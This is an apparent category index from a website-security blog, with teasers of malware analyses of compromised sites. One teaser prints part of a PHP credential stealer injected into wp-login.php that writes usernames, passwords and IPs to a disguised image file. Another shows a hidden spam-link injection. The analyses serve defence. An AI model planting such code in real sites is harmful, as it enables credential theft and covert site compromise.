Self-destruct malware
Krasimir Konov The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access. During…
Browsing Category
Website Malware Infections
864 posts
Yet another variant of the cPanel user shadow editor malware
Luke Leal We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for…
Plugins Under Attack: July 2019
John Castro A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack…
Simple but effective backdoor
We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning…
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
“Loader for Secured Files” and arrayed b374k shell encoding
This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use…
Spam Doorway Manager
While investigating a client’s compromised website, we saw a malicious file that was being used to manage an existing SEO spam doorway. We usually refer…
Shoesinfy Spam Injections
Denis Sinegubko Lately, we’ve seen quite a few sites with injected spammy links that follow this format: <div style=”position: absolute; opacity: 0.001; z-index: 10; filter: alpha(opacity=0);”> <a…
Backdoor plugin hides from view
One of the most important traits for backdoors is the ability to remain undetected by most users — otherwise it may draw suspicion and be…
Google Analytics Swiper Disguised as Legitimate Traffic
At first glance, this short script looks like benign Google Analytics code: <script type=”text/javascript”> (function() { var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async =…
FBCMS Pharmacy Spam Website
Whenever most people think of a website CMS, they most often think of the popular options like WordPress, Joomla, or Drupal. What do all three…